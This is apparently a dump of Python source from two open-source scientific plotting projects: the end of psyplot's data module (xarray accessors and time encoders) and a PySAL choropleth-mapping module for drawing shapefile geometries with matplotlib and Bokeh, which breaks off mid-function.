return
raise ValueError(
"No array found with name {0}".format(name))
@xr.register_dataset_accessor('psy')
class DatasetAccessor(object):
"""A dataset accessor to interface with the psyplot package"""
_filename = None
_data_store = None
_num = None
_plot = None
#: The concatenation dimension for datasets opened with open_mfdataset
_concat_dim = None
#: The combine method to open multiple datasets with open_mfdataset
_combine = None
@property
def num(self):
"""A unique number for the dataset"""
if self._num is None:
self._num = next(_ds_counter)
return self._num
@num.setter
def num(self, value):
self._num = value
def __init__(self, ds):
self.ds = ds
@property
def plot(self):
"""An object to generate new plots from this dataset
To make a 2D-plot with the :mod:`psy-simple <psy_simple.plugin>`
plugin, you can just type
.. code-block:: python
project = ds.psy.plot.plot2d(name='variable-name')
It will create a new subproject with the extracted and visualized data.
See Also
--------
psyplot.project.DatasetPlotter: for the different plot methods
"""
if self._plot is None:
import psyplot.project as psy
self._plot = psy.DatasetPlotter(self.ds)
return self._plot
@property
def filename(self):
"""The name of the file that stores this dataset"""
fname = self._filename
if fname is None:
fname = get_filename_ds(self.ds, dump=False)[0]
return fname
@filename.setter
def filename(self, value):
self._filename = value
@property
def data_store(self):
"""The :class:`xarray.backends.common.AbstractStore` used to save the
dataset"""
store_info = self._data_store
if store_info is None or any(s is None for s in store_info):
store = getattr(self.ds, '_file_obj', None)
store_mod = store.__module__ if store is not None else None
store_cls = store.__class__.__name__ if store is not None else None
return store_mod, store_cls
return store_info
@data_store.setter
def data_store(self, value):
self._data_store = value
@docstrings.dedent
def create_list(self, *args, **kwargs):
"""
Create a :class:`psyplot.data.ArrayList` with arrays from this dataset
Parameters
----------
%(ArrayList.from_dataset.parameters)s
Other Parameters
----------------
%(ArrayList.from_dataset.other_parameters)s
Returns
-------
%(ArrayList.from_dataset.returns)s
See Also
--------
psyplot.data.ArrayList.from_dataset"""
return ArrayList.from_dataset(self.ds, *args, **kwargs)
def to_array(self, *args, **kwargs):
"""Same as :meth:`xarray.Dataset.to_array` but sets the base"""
# the docstring is set below
ret = self.ds.to_array(*args, **kwargs)
ret.psy.base = self.ds
return ret
to_array.__doc__ = xr.Dataset.to_array.__doc__
def __getitem__(self, key):
ret = self.ds[key]
if isinstance(ret, xr.DataArray):
ret.psy.base = self.ds
return ret
def __getattr__(self, attr):
if attr != 'ds' and attr in self.ds:
ret = getattr(self.ds, attr)
ret.psy.base = self.ds
return ret
else:
raise AttributeError("%s has not Attribute %s" % (
self.__class__.__name__, attr))
def copy(self, deep=False):
"""Copy the array
This method returns a copy of the underlying array in the :attr:`arr`
attribute. It is more stable because it creates a new `psy` accessor"""
ds = self.ds.copy(deep)
ds.psy = DatasetAccessor(ds)
return ds
class InteractiveList(ArrayList, InteractiveBase):
"""List of :class:`InteractiveArray` instances that can be plotted itself
This class combines the :class:`ArrayList` and the interactive plotting
through :class:`psyplot.plotter.Plotter` classes. It is mainly used by the
:mod:`psyplot.plotter.simple` module"""
no_auto_update = property(_no_auto_update_getter,
doc=_no_auto_update_getter.__doc__)
@no_auto_update.setter
def no_auto_update(self, value):
ArrayList.no_auto_update.fset(self, value)
InteractiveBase.no_auto_update.fset(self, value)
@property
@docstrings
def _njobs(self):
"""%(InteractiveBase._njobs)s"""
ret = super(self.__class__, self)._njobs or [0]
ret[0] += 1
return ret
@property
def psy(self):
"""Return the list itself"""
return self
logger = InteractiveBase.logger
docstrings.delete_params('InteractiveBase.parameters', 'auto_update')
@docstrings.dedent
def __init__(self, *args, **kwargs):
"""
Parameters
----------
%(ArrayList.parameters)s
%(InteractiveBase.parameters.no_auto_update)s"""
ibase_kwargs, array_kwargs = utils.sort_kwargs(
kwargs, ['plotter', 'arr_name'])
self._registered_updates = {}
InteractiveBase.__init__(self, **ibase_kwargs)
with self.block_signals:
ArrayList.__init__(self, *args, **kwargs)
@docstrings.dedent
def _register_update(self, method='isel', replot=False, dims={}, fmt={},
force=False, todefault=False):
"""
Register new dimensions and formatoptions for updating
Parameters
----------
%(InteractiveArray._register_update.parameters)s"""
ArrayList._register_update(self, method=method, dims=dims)
InteractiveBase._register_update(self, fmt=fmt, todefault=todefault,
replot=bool(dims) or replot,
force=force)
@docstrings.dedent
def start_update(self, draw=None, queues=None):
"""
Conduct the formerly registered updates
This method conducts the updates that have been registered via the
:meth:`update` method. You can call this method if the
:attr:`auto_update` attribute of this instance is True and the
`auto_update` parameter in the :meth:`update` method has been set to
False
Parameters
----------
%(InteractiveBase.start_update.parameters)s
Returns
-------
%(InteractiveBase.start_update.returns)s
See Also
--------
:attr:`no_auto_update`, update
"""
if queues is not None:
queues[0].get()
try:
for arr in self:
arr.psy.start_update(draw=False)
self.onupdate.emit()
except Exception:
self._finish_all(queues)
raise
if queues is not None:
queues[0].task_done()
return InteractiveBase.start_update(self, draw=draw, queues=queues)
def to_dataframe(self):
def to_df(arr):
df = arr.to_pandas()
if hasattr(df, 'to_frame'):
df = df.to_frame()
if not keep_names:
return df.rename(columns={df.keys()[0]: arr.psy.arr_name})
return df
if len(self) == 1:
return self[0].to_series().to_frame()
else:
keep_names = len(set(arr.name for arr in self)) == self
df = to_df(self[0])
for arr in self[1:]:
df = df.merge(to_df(arr), left_index=True, right_index=True,
how='outer')
return df
docstrings.delete_params('ArrayList.from_dataset.parameters', 'plotter')
docstrings.delete_kwargs('ArrayList.from_dataset.other_parameters',
'args', 'kwargs')
@classmethod
@docstrings.dedent
def from_dataset(cls, *args, **kwargs):
"""
Create an InteractiveList instance from the given base dataset
Parameters
----------
%(ArrayList.from_dataset.parameters.no_plotter)s
plotter: psyplot.plotter.Plotter
The plotter instance that is used to visualize the data in this
list
make_plot: bool
If True, the plot is made
Other Parameters
----------------
%(ArrayList.from_dataset.other_parameters.no_args_kwargs)s
``**kwargs``
Further keyword arguments may point to any of the dimensions of the
data (see `dims`)
Returns
-------
%(ArrayList.from_dataset.returns)s"""
plotter = kwargs.pop('plotter', None)
make_plot = kwargs.pop('make_plot', True)
instance = super(InteractiveList, cls).from_dataset(*args, **kwargs)
if plotter is not None:
plotter.initialize_plot(instance, make_plot=make_plot)
return instance
def extend(self, *args, **kwargs):
# reimplemented to emit onupdate
super(InteractiveList, self).extend(*args, **kwargs)
self.onupdate.emit()
def append(self, *args, **kwargs):
# reimplemented to emit onupdate
super(InteractiveList, self).append(*args, **kwargs)
self.onupdate.emit()
def to_interactive_list(self):
return self
class _MissingModule(object):
"""Class that can be used if an optional module is not avaible.
This class raises an error if any attribute is accessed or it is called"""
def __init__(self, error):
"""
Parameters
----------
error: ImportError
The error that has been raised when tried to import the module"""
self.error = error
def __getattr__(self, attr):
raise self.error
def __call__(self, *args, **kwargs):
raise self.error
def _open_ds_from_store(fname, store_mod=None, store_cls=None, **kwargs):
"""Open a dataset and return it"""
if isinstance(fname, xr.Dataset):
return fname
if not isstring(fname):
try: # test iterable
fname[0]
except TypeError:
pass
else:
if store_mod is not None and store_cls is not None:
if isstring(store_mod):
store_mod = repeat(store_mod)
if isstring(store_cls):
store_cls = repeat(store_cls)
fname = [_open_store(sm, sc, f)
for sm, sc, f in zip(store_mod, store_cls, fname)]
kwargs['engine'] = None
kwargs['lock'] = False
return open_mfdataset(fname, **kwargs)
else:
# try guessing with open_dataset
return open_mfdataset(fname, **kwargs)
if store_mod is not None and store_cls is not None:
fname = _open_store(store_mod, store_cls, fname)
return open_dataset(fname, **kwargs)
def decode_absolute_time(times):
def decode(t):
day = np.floor(t).astype(int)
sub = t - day
rest = dt.timedelta(days=sub)
# round microseconds
if rest.microseconds:
rest += dt.timedelta(microseconds=1e6 - rest.microseconds)
return np.datetime64(dt.datetime.strptime(
"%i" % day, "%Y%m%d") + rest)
return np.vectorize(decode, [np.datetime64])(times)
def encode_absolute_time(times):
def encode(t):
t = to_datetime(t)
return float(t.strftime('%Y%m%d')) + (
t - dt.datetime(t.year, t.month, t.day)).total_seconds() / 86400.
return np.vectorize(encode, [float])(times)
class AbsoluteTimeDecoder(NDArrayMixin):
def __init__(self, array):
self.array = array
example_value = first_n_items(array, 1) or 0
try:
result = decode_absolute_time(example_value)
except Exception:
logger.error("Could not interprete absolute time values!")
raise
else:
self._dtype = getattr(result, 'dtype', np.dtype('object'))
@property
def dtype(self):
return self._dtype
def __getitem__(self, key):
return decode_absolute_time(self.array[key])
class AbsoluteTimeEncoder(NDArrayMixin):
def __init__(self, array):
self.array = array
example_value = first_n_items(array, 1) or 0
try:
result = encode_absolute_time(example_value)
except Exception:
logger.error("Could not interprete absolute time values!")
raise
else:
self._dtype = getattr(result, 'dtype', np.dtype('object'))
@property
def dtype(self):
return self._dtype
def __getitem__(self, key):
return encode_absolute_time(self.array[key])
|
Chilipp/psyplot
|
psyplot/data.py
|
Python
|
gpl-2.0
| 191,460
|
[
"NetCDF"
] |
32debfed6101e650ae0fab04e49c27c5046cd71d833e0137c5acee30cd3cebc7
|
"""
Choropleth mapping using PySAL
ToDo:
* map_line_shp, map_point_shp should take a shp object not a shp_link
* Same for map_poly_shp(_lonlat)
"""
__author__ = "Sergio Rey <sjsrey@gmail.com>", "Dani Arribas-Bel <daniel.arribas.bel@gmail.com"
from warnings import warn
import pandas as pd
import pysal as ps
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import colors as clrs
import matplotlib as mpl
from matplotlib.pyplot import fill, text
from matplotlib import cm
from matplotlib.patches import Polygon
import collections
from matplotlib.path import Path
from matplotlib.collections import LineCollection, PathCollection, PolyCollection, PathCollection, PatchCollection, CircleCollection
from color import get_color_map
try:
import bokeh.plotting as bk
from bokeh.models import HoverTool
except:
warn('Bokeh not installed. Functionality ' \
'related to it will not work')
# Classifier helper
classifiers = ps.esda.mapclassify.CLASSIFIERS
classifier = {c.lower():getattr(ps.esda.mapclassify,c) for c in classifiers}
def value_classifier(y, scheme='Quantiles', **kwargs):
"""
Return classification for an indexed Series of values
...
Arguments
---------
y : Series
Indexed series containing values to be classified
scheme : str
[Optional. Default='Quantiles'] Name of the PySAL classifier
to be used
**kwargs : dict
Additional arguments specific to the classifier of choice
(see the classifier's documentation for details)
Returns
-------
labels : Series
Indexed series containing classes for each observation
classification : Map_Classifier instance
"""
c = classifier[scheme.lower()](y, **kwargs)
return (pd.Series(c.yb, index=y.index), c)
# Low-level pieces
def map_point_shp(shp, which='all', bbox=None):
'''
Create a map object from a point shape
...
Arguments
---------
shp : iterable
PySAL point iterable (e.g.
shape object from `ps.open` a point shapefile) If it does
not contain the attribute `bbox`, it must be passed
separately in `bbox`.
which : str/list
List of booleans for which polygons of the shapefile to
be included (True) or excluded (False)
bbox : None/list
[Optional. Default=None] List with bounding box as in a
PySAL object. If nothing is passed, it tries to obtain
it as an attribute from `shp`.
Returns
-------
map : PatchCollection
Map object with the points from the shape
'''
if not bbox:
bbox = shp.bbox
pts = []
if which == 'all':
for pt in shp:
pts.append(pt)
else:
for inwhich, pt in zip(which, shp):
if inwhich:
pts.append(pt)
pts = np.array(pts)
sc = plt.scatter(pts[:, 0], pts[:, 1])
#print(sc.get_axes().get_xlim())
#_ = _add_axes2col(sc, bbox)
#print(sc.get_axes().get_xlim())
return sc
def map_line_shp(shp, which='all', bbox=None):
'''
Create a map object from a line shape
...
Arguments
---------
shp : iterable
PySAL line iterable (e.g.
shape object from `ps.open` a line shapefile) If it does
not contain the attribute `bbox`, it must be passed
separately in `bbox`.
which : str/list
List of booleans for which polygons of the shapefile to
be included (True) or excluded (False)
bbox : None/list
[Optional. Default=None] List with bounding box as in a
PySAL object. If nothing is passed, it tries to obtain
it as an attribute from `shp`.
Returns
-------
map : PatchCollection
Map object with the lines from the shape
This includes the attribute `shp2dbf_row` with the
cardinality of every line to its row in the dbf
(zero-offset)
'''
if not bbox:
bbox = shp.bbox
patches = []
rows = []
i = 0
if which == 'all':
for shape in shp:
for xy in shape.parts:
patches.append(xy)
rows.append(i)
i += 1
else:
for inwhich, shape in zip(which, shp):
if inwhich:
for xy in shape.parts:
patches.append(xy)
rows.append(i)
i += 1
lc = LineCollection(patches)
#_ = _add_axes2col(lc, bbox)
lc.shp2dbf_row = rows
return lc
def map_poly_shp(shp, which='all', bbox=None):
'''
Create a map object from a polygon shape
...
Arguments
---------
shp : iterable
PySAL polygon iterable (e.g.
shape object from `ps.open` a poly shapefile) If it does
not contain the attribute `bbox`, it must be passed
separately in `bbox`.
which : str/list
List of booleans for which polygons of the shapefile to
be included (True) or excluded (False)
bbox : None/list
[Optional. Default=None] List with bounding box as in a
PySAL object. If nothing is passed, it tries to obtain
it as an attribute from `shp`.
Returns
-------
map : PatchCollection
Map object with the polygons from the shape
This includes the attribute `shp2dbf_row` with the
cardinality of every polygon to its row in the dbf
(zero-offset)
'''
if not bbox:
bbox = shp.bbox
patches = []
rows = []
i = 0
if which == 'all':
for shape in shp:
for ring in shape.parts:
xy = np.array(ring)
patches.append(xy)
rows.append(i)
i += 1
else:
for inwhich, shape in zip(which, shp):
if inwhich:
for ring in shape.parts:
xy = np.array(ring)
patches.append(xy)
rows.append(i)
i += 1
pc = PolyCollection(patches)
#_ = _add_axes2col(pc, bbox)
pc.shp2dbf_row = rows
return pc
# Mid-level pieces
def setup_ax(polyCos_list, bboxs, ax=None):
'''
Generate an Axes object for a list of collections
...
Arguments
---------
polyCos_list: list
List of Matplotlib collections (e.g. an object from
map_poly_shp)
bboxs : list
List of lists, each containing the bounding box of the
respective polyCo, expressed as [xmin, ymin, xmax, ymax]
ax : AxesSubplot
(Optional) Pre-existing axes to which append the collections
and setup
Returns
-------
ax : AxesSubplot
Rescaled axes object with the collection and without frame
or X/Yaxis
'''
if not ax:
ax = plt.axes()
for polyCo, bbox in zip(polyCos_list, bboxs):
ax.add_collection(polyCo)
polyCo.axes.set_xlim((bbox[0], bbox[2]))
polyCo.axes.set_ylim((bbox[1], bbox[3]))
abboxs = np.array(bboxs)
ax.set_xlim((abboxs[:, 0].min(), \
abboxs[:, 2].max()))
ax.set_ylim((abboxs[:, 1].min(), \
abboxs[:, 3].max()))
ax.set_frame_on(False)
ax.axes.get_yaxis().set_visible(False)
ax.axes.get_xaxis().set_visible(False)
return ax
def _add_axes2col(col, bbox):
"""
Adds (inplace) axes with proper limits to a poly/line collection. This is
still pretty much a hack! Ideally, you don't have to setup a new figure
for this
...
Arguments
---------
col : Collection
bbox : list
Bounding box as [xmin, ymin, xmax, ymax]
"""
tf = plt.figure()
ax = plt.axes()
minx, miny, maxx, maxy = bbox
ax.set_xlim((minx, maxx))
ax.set_ylim((miny, maxy))
col.set_axes(ax)
plt.close(tf)
return None
def base_choropleth_classless(map_obj, values, cmap='Greys' ):
'''
Set classless coloring from a map object
...
Arguments
---------
map_obj : Poly/Line collection
Output from map_X_shp
values : array
Numpy array with values to map
cmap : str
Matplotlib coloring scheme
Returns
-------
map : PatchCollection
Map object with the polygons from the shapefile and
classless coloring
'''
cmap = cm.get_cmap(cmap)
map_obj.set_cmap(cmap)
if isinstance(map_obj, mpl.collections.PolyCollection):
pvalues = _expand_values(values, map_obj.shp2dbf_row)
map_obj.set_array(pvalues)
map_obj.set_edgecolor('k')
elif isinstance(map_obj, mpl.collections.LineCollection):
pvalues = _expand_values(values, map_obj.shp2dbf_row)
map_obj.set_array(pvalues)
elif isinstance(map_obj, mpl.collections.PathCollection):
if not hasattr(map_obj, 'shp2dbf_row'):
map_obj.shp2dbf_row = np.arange(values.shape[0])
map_obj.set_array(values)
return map_obj
def base_choropleth_unique(map_obj, values, cmap='hot_r'):
'''
Set coloring based on unique values from a map object
...
Arguments
---------
map_obj : Poly/Line collection
Output from map_X_shp
values : array
Numpy array with values to map
cmap : dict/str
[Optional. Default='hot_r'] Dictionary mapping {value:
color}. Alternatively, a string can be passed specifying
the Matplotlib coloring scheme for a random assignment
of {value: color}
Returns
-------
map : PatchCollection
Map object with the polygons from the shapefile and
unique value coloring
'''
if type(cmap) == str:
uvals = np.unique(values)
colormap = getattr(plt.cm, cmap)
colors = [colormap(i) for i in np.linspace(0, 0.9, len(uvals))]
colors = np.random.permutation(colors)
colormatch = {val: col for val, col in zip(uvals, colors)}
elif type(cmap) == dict:
colormatch = cmap
else:
raise Exception("`cmap` can only take a str or a dict")
if isinstance(map_obj, mpl.collections.PolyCollection):
pvalues = _expand_values(values, map_obj.shp2dbf_row)
map_obj.set_color([colormatch[i] for i in pvalues])
map_obj.set_edgecolor('k')
elif isinstance(map_obj, mpl.collections.LineCollection):
pvalues = _expand_values(values, map_obj.shp2dbf_row)
map_obj.set_color([colormatch[i] for i in pvalues])
elif isinstance(map_obj, mpl.collections.PathCollection):
if not hasattr(map_obj, 'shp2dbf_row'):
map_obj.shp2dbf_row = np.arange(values.shape[0])
map_obj.set_array(values)
return map_obj
def base_choropleth_classif(map_obj, values, classification='quantiles',
k=5, cmap='hot_r', sample_fisher=False):
'''
Set coloring based based on different classification
methods
...
Arguments
---------
map_obj : Poly/Line collection
Output from map_X_shp
values : array
Numpy array with values to map
classification : str
Classificatio method to use. Options supported:
* 'quantiles' (default)
* 'fisher_jenks'
* 'equal_interval'
k : int
Number of bins to classify values in and assign a color
to
cmap : str
Matplotlib coloring scheme
sample_fisher : Boolean
Defaults to False, controls whether Fisher-Jenks
classification uses a sample (faster) or the entire
array of values. Ignored if 'classification'!='fisher_jenks'
The percentage of the sample that takes at a time is 10%
Returns
-------
map : PatchCollection
Map object with the polygons from the shapefile and
unique value coloring
'''
if classification == 'quantiles':
classification = ps.Quantiles(values, k)
boundaries = classification.bins.tolist()
if classification == 'equal_interval':
classification = ps.Equal_Interval(values, k)
boundaries = classification.bins.tolist()
if classification == 'fisher_jenks':
if sample_fisher:
classification = ps.esda.mapclassify.Fisher_Jenks_Sampled(values,k)
else:
classification = ps.Fisher_Jenks(values,k)
boundaries = classification.bins[:]
map_obj.set_alpha(0.4)
cmap = cm.get_cmap(cmap, k+1)
map_obj.set_cmap(cmap)
boundaries = np.insert(boundaries, 0, values.min())
norm = clrs.BoundaryNorm(boundaries, cmap.N)
map_obj.set_norm(norm)
if isinstance(map_obj, mpl.collections.PolyCollection):
pvalues = _expand_values(values, map_obj.shp2dbf_row)
map_obj.set_array(pvalues)
map_obj.set_edgecolor('k')
elif isinstance(map_obj, mpl.collections.LineCollection):
pvalues = _expand_values(values, map_obj.shp2dbf_row)
map_obj.set_array(pvalues)
elif isinstance(map_obj, mpl.collections.PathCollection):
if not hasattr(map_obj, 'shp2dbf_row'):
map_obj.shp2dbf_row = np.arange(values.shape[0])
map_obj.set_array(values)
return map_obj
def base_lisa_cluster(map_obj, lisa, p_thres=0.01):
'''
Set coloring on a map object based on LISA results
...
Arguments
---------
map_obj : Poly/Line collection
Output from map_X_shp
lisa : Moran_Local
LISA object from PySAL
p_thres : float
Significant threshold for clusters
Returns
-------
map : PatchCollection
Map object with the polygons from the shapefile and
unique value coloring
'''
sign = lisa.p_sim < p_thres
quadS = lisa.q * sign
sig_quadS = pd.Series(quadS).values
lisa_patch = base_choropleth_unique(map_obj, sig_quadS, lisa_clrs)
lisa_patch.set_alpha(1)
return lisa_patch
def lisa_legend_components(lisa, p_thres):
'''
Generate the lists `boxes` and `labels` required to build LISA legend
NOTE: if non-significant values, they're consistently assigned at the end
...
Arguments
---------
lisa : Moran_Local
LISA object from PySAL
p_thres : float
Significant threshold for clusters
Returns
-------
boxes : list
List with colors of the boxes to draw on the legend
labels : list
List with labels to anotate the legend colors, aligned
with `boxes`
'''
sign = lisa.p_sim < p_thres
quadS = lisa.q * sign
cls = list(set(quadS))
boxes = []
labels = []
np.sort(cls)
for cl in cls:
boxes.append(mpl.patches.Rectangle((0, 0), 1, 1,
facecolor=lisa_clrs[cl]))
labels.append(lisa_lbls[cl])
if 0 in cls:
i = labels.index('Non-significant')
boxes = boxes[:i] + boxes[i+1:] + [boxes[i]]
labels = labels[:i] + labels[i+1:] + [labels[i]]
return boxes, labels
def _expand_values(values, shp2dbf_row):
'''
Expand series of values based on dbf order to polygons (to allow plotting
of multi-part polygons).
...
NOTE: this is done externally so it's easy to drop dependency on Pandas
when neccesary/time is available.
Arguments
---------
values : ndarray
Values aligned with dbf rows to be plotted (e.d.
choropleth)
shp2dbf_row : list/sequence
Cardinality list of polygon to dbf row as provided by
map_poly_shp
Returns
-------
pvalues : ndarray
Values repeated enough times in the right order to be
passed from dbf to polygons
'''
pvalues = pd.Series(values, index=np.arange(values.shape[0]))\
.reindex(shp2dbf_row)#Expand values to every poly
return pvalues.values
# High-level pieces
def geoplot(db, col=None, palette='BuGn', classi='Quantiles',
backend='mpl', color=None, facecolor='#4D4D4D', edgecolor='#B3B3B3',
alpha=1., linewidth=0.2, marker='o', marker_size=20,
ax=None, hover=True, p=None, tips=None, figsize=(9,9), **kwargs):
'''
Higher level plotter for geotables
...
Arguments
---------
db : DataFrame
GeoTable with 'geometry' column and values to be plotted.
col : None/str
[Optional. Default=None] Column holding the values to encode
into the choropleth.
palette : str/palettable palette
String of the `palettable.colorbrewer` portfolio, or a
`palettable` palette to use
classi : str
[Optional. Default='mpl'] Backend to plot the
backend : str
[Optional. Default='mpl'] Backend to plot the
geometries. Available options include Matplotlib ('mpl') or
Bokeh ('bk').
color : str/tuple/Series
[Optional. Default=None] Wrapper that sets both `facecolor`
and `edgecolor` at the same time. If set, `facecolor` and
`edgecolor` are ignored. It allows for either a single color
or a Series of the same length as `gc` with colors, indexed
on `gc.index`.
facecolor : str/tuple/Series
[Optional. Default='#4D4D4D'] Color for polygons and points. It
allows for either a single color or a Series of the same
length as `gc` with colors, indexed on `gc.index`.
edgecolor : str/tuple/Series
[Optional. Default='#B3B3B3'] Color for the polygon and point
edges. It allows for either a single color or a Series of
the same length as `gc` with colors, indexed on `gc.index`.
alpha : float/Series
[Optional. Default=1.] Transparency. It allows for either a
single value or a Series of the same length as `gc` with
colors, indexed on `gc.index`.
linewidth : float/Series
[Optional. Default=0.2] Width(s) of the lines in polygon and
line plotting (not applicable to points). It allows for
either a single value or a Series of the same length as `gc`
with colors, indexed on `gc.index`.
marker : str
[Optional. `mpl` backend only. Default='o'] Marker for point
plotting.
marker_size : int/Series
[Optional. Default=0.15] Width(s) of the lines in polygon and
ax : AxesSubplot
[Optional. `mpl` backend only. Default=None] Pre-existing
axes to which append the geometries.
hover : Boolean
[Optional. `bk` backend only. Default=True] Include hover tool.
p : bokeh.plotting.figure
[Optional. `bk` backend only. Default=None] Pre-existing
bokeh figure to which append the collections and setup.
tips : list of strings
series names to add to hover tool
kwargs : Dict
Additional named vaues to be passed to the classifier of choice.
'''
if col:
if hasattr(palette, 'number') and 'k' in kwargs:
if kwargs['k'] > palette.number:
raise ValueError('The number of classes requested is greater than '
'the number of colors available in the palette.')
lbl,c = value_classifier(db[col], scheme=classi, **kwargs)
if type(palette) is not str:
palette = get_color_map(palette=palette, k=c.k)
else:
palette = get_color_map(name=palette, k=c.k)
facecolor = lbl.map({i:j for i,j in enumerate(palette)})
try:
kwargs.pop('k')
except KeyError:
pass
col = [(col, db[col])]
if tips:
for tip in tips:
col.append((tip, db[tip]))
col.append(('index', db.index.values))
col = collections.OrderedDict(col) # put mapped variable at the top
if backend is 'mpl':
plot_geocol_mpl(db['geometry'], facecolor=facecolor, ax=ax,
color=color, edgecolor=edgecolor, alpha=alpha,
linewidth=linewidth, marker=marker, marker_size=marker_size,
figsize=figsize,
**kwargs)
elif backend is 'bk':
plot_geocol_bk(db['geometry'], facecolor=facecolor,
color=color, edgecolor=edgecolor, alpha=alpha,
linewidth=linewidth, marker_size=marker_size,
hover=hover, p=p, col=col, **kwargs)
else:
warn("Please choose an available backend")
return None
def plot_geocol_mpl(gc, color=None, facecolor='0.3', edgecolor='0.7',
alpha=1., linewidth=0.2, marker='o', marker_size=20,
ax=None, figsize=(9,9)):
'''
Plot geographical data from the `geometry` column of a PySAL geotable to a
matplotlib backend.
...
Arguments
---------
gc : DataFrame
GeoCol with data to be plotted.
color : str/tuple/Series
[Optional. Default=None] Wrapper that sets both `facecolor`
and `edgecolor` at the same time. If set, `facecolor` and
`edgecolor` are ignored. It allows for either a single color
or a Series of the same length as `gc` with colors, indexed
on `gc.index`.
facecolor : str/tuple/Series
[Optional. Default='0.3'] Color for polygons and points. It
allows for either a single color or a Series of the same
length as `gc` with colors, indexed on `gc.index`.
edgecolor : str/tuple/Series
[Optional. Default='0.7'] Color for the polygon and point
edges. It allows for either a single color or a Series of
the same length as `gc` with colors, indexed on `gc.index`.
alpha : float/Series
[Optional. Default=1.] Transparency. It allows for either a
single value or a Series of the same length as `gc` with
colors, indexed on `gc.index`.
linewidth : float/Series
[Optional. Default=0.2] Width(s) of the lines in polygon and
line plotting (not applicable to points). It allows for
either a single value or a Series of the same length as `gc`
with colors, indexed on `gc.index`.
marker : 'o'
marker_size : int
ax : AxesSubplot
[Optional. Default=None] Pre-existing axes to which append the
collections and setup
figsize : tuple
w,h of figure
'''
geom = type(gc.iloc[0])
if color is not None:
facecolor = edgecolor = color
draw = False
if not ax:
f, ax = plt.subplots(1, figsize=figsize)
draw = True
# Geometry plotting
patches = []
ids = []
## Polygons
if geom == ps.cg.shapes.Polygon:
for id, shape in gc.iteritems():
for ring in shape.parts:
xy = np.array(ring)
patches.append(xy)
ids.append(id)
mpl_col = PolyCollection(patches)
## Lines
elif geom == ps.cg.shapes.Chain:
for id, shape in gc.iteritems():
for xy in shape.parts:
patches.append(xy)
ids.append(id)
mpl_col = LineCollection(patches)
facecolor = 'None'
## Points
elif geom == ps.cg.shapes.Point:
edgecolor = facecolor
xys = np.array(zip(*gc)).T
ax.scatter(xys[:, 0], xys[:, 1], marker=marker,
s=marker_size, c=facecolor, edgecolors=edgecolor,
linewidths=linewidth)
mpl_col = None
# Styling mpl collection (polygons & lines)
if mpl_col:
if type(facecolor) is pd.Series:
facecolor = facecolor.reindex(ids)
mpl_col.set_facecolor(facecolor)
if type(edgecolor) is pd.Series:
edgecolor = edgecolor.reindex(ids)
mpl_col.set_edgecolor(edgecolor)
if type(linewidth) is pd.Series:
linewidth = linewidth.reindex(ids)
mpl_col.set_linewidth(linewidth)
if type(alpha) is pd.Series:
alpha = alpha.reindex(ids)
mpl_col.set_alpha(alpha)
ax.add_collection(mpl_col, autolim=True)
ax.autoscale_view()
ax.set_axis_off()
if draw:
plt.axis('equal')
plt.show()
return None
def plot_geocol_bk(gc, color=None, facecolor='#4D4D4D', edgecolor='#B3B3B3',
alpha=1., linewidth=0.2, marker_size=10, hover=True, p=None, col=None):
'''
Plot geographical data from the `geometry` column of a PySAL geotable to a
bokeh backend.
...
Arguments
---------
gc : DataFrame
GeoCol with data to be plotted.
col : None/dict
[Optional. Default=None] Dictionary with key, values for entries in hover tool
color : str/tuple/Series
[Optional. Default=None] Wrapper that sets both `facecolor`
and `edgecolor` at the same time. If set, `facecolor` and
`edgecolor` are ignored. It allows for either a single color
or a Series of the same length as `gc` with colors, indexed
on `gc.index`.
facecolor : str/tuple/Series
[Optional. Default='0.3'] Color for polygons and points. It
allows for either a single color or a Series of the same
length as `gc` with colors, indexed on `gc.index`.
edgecolor : str/tuple/Series
[Optional. Default='0.7'] Color for the polygon and point
edges. It allows for either a single color or a Series of
the same length as `gc` with colors, indexed on `gc.index`.
alpha : float/Series
[Optional. Default=1.] Transparency. It allows for either a
single value or a Series of the same length as `gc` with
colors, indexed on `gc.index`.
linewidth : float/Series
[Optional. Default=0.2] Width(s) of the lines in polygon and
line plotting (not applicable to points). It allows for
either a single value or a Series of the same length as `gc`
with colors, indexed on `gc.index`.
marker_size : int
hover : Boolean
Include hover tool
p : bokeh.plotting.figure
[Optional. Default=None] Pre-existing bokeh figure to which
append the collections and setup.
'''
geom = type(gc.iloc[0])
if color is not None:
facecolor = edgecolor = color
draw = False
if not p:
TOOLS="pan,wheel_zoom,box_zoom,reset,save"
if hover:
TOOLS += ',hover'
p = bk.figure(tools=TOOLS,
x_axis_location=None, y_axis_location=None)
p.grid.grid_line_color = None
draw = True
# Geometry plotting
patch_xs = []
patch_ys = []
ids = []
pars = {'fc': facecolor, \
'ec': edgecolor, \
'alpha': alpha, \
'lw': linewidth, \
'ms': marker_size}
## Polygons + Lines
if (geom == ps.cg.shapes.Polygon) or \
(geom == ps.cg.shapes.Chain):
for idx, shape in gc.iteritems():
for ring in shape.parts:
xs, ys = zip(*ring)
patch_xs.append(xs)
patch_ys.append(ys)
ids.append(idx)
if hover and col:
tips = []
ds = dict(x=patch_xs, y=patch_ys)
for k,v in col.iteritems():
ds[k] = v
tips.append((k, "@"+k))
cds = bk.ColumnDataSource(data=ds)
h = p.select_one(HoverTool)
h.point_policy = 'follow_mouse'
h.tooltips = tips
else:
cds = bk.ColumnDataSource(data=dict(
x=patch_xs,
y=patch_ys
))
if type(facecolor) is pd.Series:
cds.add(facecolor.reindex(ids), 'facecolor')
pars['fc'] = 'facecolor'
if type(edgecolor) is pd.Series:
cds.add(edgecolor.reindex(ids), 'edgecolor')
pars['ec'] = 'edgecolor'
if type(alpha) is pd.Series:
cds.add(alpha.reindex(ids), 'alpha')
pars['alpha'] = 'alpha'
if type(linewidth) is pd.Series:
cds.add(linewidth.reindex(ids), 'linewidth')
pars['lw'] = 'linewidth'
if geom == ps.cg.shapes.Polygon:
p.patches('x', 'y', source=cds,
fill_color=pars['fc'],
line_color=pars['ec'],
fill_alpha=pars['alpha'],
line_width=pars['lw']
)
elif geom == ps.cg.shapes.Chain:
p.multi_line('x', 'y', source=cds,
line_color=pars['ec'],
line_alpha=pars['alpha'],
line_width=pars['lw']
)
facecolor = 'None'
## Points
elif geom == ps.cg.shapes.Point:
edgecolor = facecolor
xys = np.array(zip(*gc)).T
cds = bk.ColumnDataSource(data=dict(
x=xys[:, 0],
y=xys[:, 1]
))
if type(facecolor) is pd.Series:
cds.add(facecolor.reindex(ids), 'facecolor')
pars['fc'] = 'facecolor'
if type(edgecolor) is pd.Series:
